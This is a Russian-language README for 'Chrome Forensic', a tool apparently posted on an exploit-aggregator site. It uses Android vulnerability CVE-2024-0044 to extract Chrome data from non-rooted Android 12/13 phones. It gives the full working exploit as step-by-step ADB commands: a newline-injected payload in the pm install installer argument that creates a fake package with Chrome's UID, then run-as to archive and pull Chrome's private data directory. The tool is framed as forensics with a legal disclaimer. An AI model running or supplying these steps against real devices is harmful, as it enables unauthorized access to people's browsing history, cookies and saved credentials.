## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JACKTEKNO-CHROME-FORENSIC_CVE-2024-0044
# 🔍 Chrome Forensic - CVE-2024-0044
   
**Мощный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome с устройств Android**
Возможности • Установка • Использование • Документация
* * *
## 👤 Информация об авторе
**Автор:** JackTekno
**GitHub:** github.com/JackTekno
* * *
## 📋 Обзор
Этот инструмент использует уязвимость **CVE-2024-0044** (Run-as) для обхода ограничений прав доступа на нерутированных устройствах Android 12/13, что позволяет выполнять криминалистическое извлечение данных Google Chrome. Инструмент анализирует сырые базы данных SQLite и формирует комплексные отчёты.
## 🔄 Процесс работы

_Полный рабочий процесс криминалистического анализа от сбора данных до формирования отчета_
* * *
## 📊 Возможности и вывод
Инструмент генерирует подробный отчёт в формате Excel (`result_chrome_forensic.xlsx`) со следующими листами:
* * *
## 🛠️ Предварительные требования
### Требования к оборудованию
* 📱 Телефон Android (Android 12/13)
* 💻 ПК (Linux/Windows/Mac)
### Тестированная среда
* 🐧 ОС: Linux UOS 20 Professional
### Требования к ПО
* 🐍 Python 3.x
* 📲 ADB (Android Debug Bridge)
* 📦 Файл Dummy APK (например, `F-Droid.apk`)
* * *
## 🚀 Установка
1. **Клонировать репозиторий**
root@kitploit:~
git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
cd Chrome-Forensic_CVE-2024-0044
2. **Установить зависимости**
root@kitploit:~
pip install -r requirements.txt
* * *
## 🔓 Руководство по сбору данных
### Шаг 1: Подготовка устройства
1. Перейдите в **Настройки → О телефоне**
2. Нажмите **Номер сборки** 7 раз, чтобы включить режим разработчика
3. Перейдите в **Настройки → Система → Параметры разработчика**
4. Включите **Отладку по USB**
5. Подключите телефон к ПК через USB и подтвердите подключение
### Шаг 2: Подготовка эксплойта
root@kitploit:~
# Поместите фиктивный APK во временную папку
adb push F-Droid.apk /data/local/tmp/base.apk
### Шаг 3: Найдите целевой UID
root@kitploit:~
adb shell pm list packages -U | grep com.android.chrome
# Пример вывода: package:com.android.chrome uid:10129
# Запомните UID (например, 10129)
### Шаг 4: Выполнение эксплойта
> ⚠️ Замените `10129` на фактический UID Chrome из шага 3
root@kitploit:~
adb shell
# Внутри оболочки ADB:
PAYLOAD="@null
victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# Запустите менеджер пакетов
pm install -i "$PAYLOAD" /data/local/tmp/base.apk
### Шаг 5: Извлечение данных
root@kitploit:~
# Всё ещё внутри оболочки ADB
run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
# Выйти из оболочки ADB
exit
### Шаг 6: Скачать данные на ПК
root@kitploit:~
adb pull /data/local/tmp/chrome.tar .
### Шаг 7: Распаковать данные
Распакуйте файл 'chrome.tar' в папке проекта. Вручную перемещать файлы не нужно. Python-скрипт автоматически найдёт файлы баз данных внутри распакованных папок.
root@kitploit:~
tar -xf chrome.tar
* * *
## 💻 Использование
Запустите инструмент криминалистического анализа:
root@kitploit:~
python3 chrome_forensic.py
Инструмент проанализирует файлы баз данных и создаст `result_chrome_forensic.xlsx` в той же директории.
* * *
## ⚖️ Юридическое предупреждение
> **⚠️ ВАЖНО:** Этот инструмент предназначен **только для образовательных целей и авторизованного криминалистического анализа**.
>
> * Используйте только на устройствах, которые вам принадлежат или на анализ которых вы имеете явное письменное разрешение.
> * Несанкционированный доступ к цифровым устройствам может нарушать законы вашей юрисдикции.
> * Авторы не несут ответственности за неправомерное использование данного инструмента.
>
* * *
## 🤝 Вклад
Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.
* * *
## 📄 Лицензия
Этот проект лицензирован под GNU General Public License v3.0. См. файл LICENSE для получения подробной информации.
* * *
## 👤 Благодарности
Доказательство концепции метода сбора было обобщено и опубликовано Tinyhack.com.
* * *
**Сделано с ❤️ от JackTekno**
⭐ Поставить звезду • 🐛 Сообщить об ошибке • 💡 Запросить функцию